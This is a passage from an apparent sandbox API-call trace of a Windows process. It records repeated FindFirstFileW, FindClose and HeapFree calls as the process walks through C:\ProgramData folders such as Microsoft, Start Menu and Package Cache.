lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.449] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.449] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0xffffffff [0112.452] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.452] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.452] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.801] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.801] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.802] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.802] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.803] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.803] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\AIT\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.803] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.803] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.804] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.804] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.804] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.804] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.806] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.806] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.806] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.806] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\GameExplorer\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.807] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.807] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0xffffffff [0112.807] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.808] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.809] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.809] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.809] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.809] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.810] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.810] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.810] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.810] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.810] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c2a0 [0112.812] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.812] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c2a0 [0112.812] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.812] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c2a0 [0112.813] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.813] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c2a0 [0112.813] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.813] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.813] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.813] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.813] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.814] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.814] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.814] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.815] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.815] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.815] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.815] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c2a0 [0112.816] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.817] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.817] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.818] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.819] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.819] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.819] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.819] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.819] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.819] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.819] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.820] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.820] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.821] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.821] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c160 [0112.821] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.821] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0113.261] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0113.261] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0113.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0xffffffff [0113.261] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0113.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0113.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0xffffffff [0113.262] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0113.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0113.263] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0113.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0113.263] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0113.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0113.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0113.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0113.263] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0113.263] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0113.263] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0113.264] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0113.264] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0113.264] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0113.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0113.266] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0113.267] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0113.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0113.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0113.269] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0113.269] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0113.269] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0113.269] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0113.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0113.269] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0113.269] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0113.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c220 [0119.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0119.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0119.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0119.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c2a0 [0119.962] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0119.963] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0119.963] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0119.963] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0119.964] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0119.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0119.964] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0119.964] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0119.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c2a0 [0121.225] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0121.225] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0121.225] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.225] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.225] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.225] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.226] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.226] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.228] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.228] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.228] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.228] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.229] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.229] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.229] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.229] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x3a0f1c8 | 